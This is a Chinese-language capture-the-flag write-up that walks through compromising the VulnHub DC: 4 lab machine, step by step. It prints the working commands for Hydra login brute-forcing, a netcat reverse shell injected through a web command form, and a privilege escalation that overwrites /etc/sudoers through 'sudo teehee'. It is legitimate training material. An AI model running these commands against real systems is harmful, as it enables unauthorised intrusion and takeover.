Site icon MkS

[資訊安全] VulnHub – DC: 4 Write-up

Photo by Tim Käbel on Unsplash

DC 系列已經完成 4/9,應該有機會在年前將整個系列結束掉,目前題目水平都還算入門,解題過程大概就算是複習打穩基礎吧,對於 DC: 4 解題的過程,也接觸到平常比較少碰到的工具,如:Hydra、wfuzz 等…。

環境設定

VirtualBox: Kali & DC: 4
Net Config: NAT Network

尋找靶機

$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-01 09:59 CST
Nmap scan report for 10.0.2.1
Host is up (0.0052s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0016s latency).
Nmap scan report for 10.0.2.7
Host is up (0.0023s latency).
Nmap scan report for 10.0.2.15
Host is up (0.0011s latency).

$ nmap 10.0.2.7 -p- -A 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-01 10:00 CST
Nmap scan report for 10.0.2.7
Host is up (0.0024s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

解題過程

直接瀏覽 80 Port 是一個缺乏美感的登入頁面,透過檢視頁面原始碼的方式,確認該頁面只是一個簡單的 Form base 功能頁,並且手動測測簡單的弱密碼未果。

目錄爆破

目錄爆破過後沒有什麼有趣的發現,僅有一開始首頁上麼登入功能可以嘗試。

$ python3 dirsearch.py -u http://10.0.2.7/ -w db/all.txt -e *                                                             

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 86760

Error Log: /home/mksyi/下載/dirsearch/logs/errors-21-02-02_10-16-53.log

Target: http://10.0.2.7/

[10:16:53] Starting: 
[10:17:02] 403 -  170B  - /images/
[10:17:12] 403 -  556B  - /css/
[10:17:56] 200 -  506B  - /index.php
[10:19:03] 302 -  704B  - /command.php  ->  index.php 
[10:19:04] 302 -  206B  - /login.php  ->  index.php 
[10:20:43] 302 -  163B  - /logout.php  ->  index.php                             
Task Completed 

嘗試登入

除了一開始使用簡單的弱密碼嘗試以外,也使用簡單的 SQL Injection 嘗試登入,但都無法成功,最後使用 THC-Hydra 來進行爆破並成功登入 admin/happy。

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.0.2.7 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-02 10:30:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.0.2.7:80/login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 10.0.2.7   login: admin   password: happy
[STATUS] attack finished for 10.0.2.7 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

使用 THC-Hydra 的過程中卡了好長一段時間,由於對工具不熟悉,該登入有登入失敗不回顯的問題,最後參考 brute-forcing-passwords-with-thc-hydra 內文中提及的 condition string 可以使用 S= 來判斷登入後的字串, 可以看見參數後方 S=logout 就是預先假設登入後可以看到登出的字串,至於 -F 則是成功早出第一組符合條件的組合即停止。

Get Shell

登入之後可以看見只有一個功能 Command,與當時情報蒐集時的目錄爆破得到的功能路徑相同。

功能中有三個選項,簡單操作並觀察輸出,很清楚明白這是系統上的資訊直接輸出到頁面上。

試著打開瀏覽器的開發者工具觀察送出的資料,發現更多驚喜,先不論是否有進行過濾,光看就看得出這是一個非常不安全的程式。

由於 radio 的值是可以控制的,這也意味有機會 RCE(Remote Code Execution) 並丟一個 Reverse shell 回來,

Listen

nc -nl -vv -p 8080

victim

nc%20-e%20%2Fbin%2Fsh%2010.0.2.15%208080
nc -e /bin/sh 10.0.2.15 8080

提權

取得 Reverse shell 後,透過 python 取得一個可以交互的 shell,並嘗試蒐集更多資訊。

python -c "import pty;pty.spawn('/bin/bash')"

SUID check

www-data@dc-4:/$ find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping

Linux exploit sugester

原先都會查看 uname -alsb_release -a 等資訊,現在找到一個好工具 linux-exploit-suggester,可以快速取得系統資訊,並分析出可能存在的 Exploit。

www-data@dc-4:/tmp$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
www-data@dc-4:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Available information:

Kernel version: 4.9.0
Architecture: i686
Distribution: debian
Distribution version: 9
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

74 kernel space exploits
45 user space exploits

Possible Exploits:

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-10149] raptor_exim_wiz

   Details: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/46996

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

但對該部分提權似乎沒有什麼幫助,透過觀察 passwd 發現系統上有三個使用者 charlesjimsam,看看是否可以再透過 THC-Hydra 爆破成功。

hydra -s 22 -v -l charles -P /usr/share/wordlists/rockyou.txt 10.0.2.7 ssh

由於 rockyou.txt 太大包了,這三個帳號各跑了大概 10 分鐘就放棄了,最後嘗試在系統上找找有沒有其他資訊時,透過 find 找到 jim 使用者底下有個 old-passwords.bak 檔案,像是一個密碼字典檔。

www-data@dc-4:~$ find / -name *.bak 2>&1  | grep -v "Permission denied"
/home/jim/backups/old-passwords.bak

www-data@dc-4:~$ cat /home/jim/backups/old-passwords.bak
000000
12345
iloveyou

...

123456k
icecream
popcorn1

於是就接管這個密碼字典檔,透過 SSH 使用 THC-Hydra 進行爆破,並成功得到密碼 jibril04

$ hydra -s 22 -v -l jim -P dc4_jim_password_list.txt 10.0.2.7 ssh 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-02 14:38:52
[DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task
[DATA] attacking ssh://10.0.2.7:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://jim@10.0.2.7:22
[INFO] Successful, password authentication is supported by ssh://10.0.2.7:22
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 77 to do in 00:01h, 16 active
[VERBOSE] Retrying connection for child 11
[22][ssh] host: 10.0.2.7   login: jim   password: jibril04
[STATUS] attack finished for 10.0.2.7 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-02 14:40:25

Login via SSH

在本機端使用 ssh 登入成功,並且開始探勘,其中登入後有一句話令我好奇 You have mail,由於對於 Linux 不熟,不知道這是登入後的罐頭訊息,還是真的需要到哪收信…。

$ ssh jim@10.0.2.7
The authenticity of host '10.0.2.7 (10.0.2.7)' can't be established.
ECDSA key fingerprint is SHA256:vtcgdCXO4d3KmnjiIIkH1Een5F1AiSx3qp0ABgwdvww.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.7' (ECDSA) to the list of known hosts.
jim@10.0.2.7's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100

接著在 /var/mail/jim 發現信件,並且可以 cat 查看內容。

jim@dc-4:~$ cat /var/mail/jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

透過 teehee 提權

看來取得 charles 帳戶的密碼了,透過 su charles 直接切換帳戶,並在 sudo -l 發現 /usr/bin/teehee

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

不清楚 teehee 是隻怎麼樣的程式,可以先透過 teehee –help 查看相關資訊。

charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

看起來就只是單純 echo 的程式,但似乎可以用來寫檔,於是腦筋動到了 sudoers 上,這部分也卡了一小段時間,原因是在 ALL=(ALL:ALL) 的括號不小心打成大括號 {},直接 sudo 掛掉,重佈幾次靶機。

charles@dc-4:~$ echo -en "charles ALL=(ALL:ALL) ALL" | sudo teehee /etc/sudoers
charles@dc-4:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for charles: 
root@dc-4:/home/charles# whoami
root
root@dc-4:~# cat flag.txt

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
Exit mobile version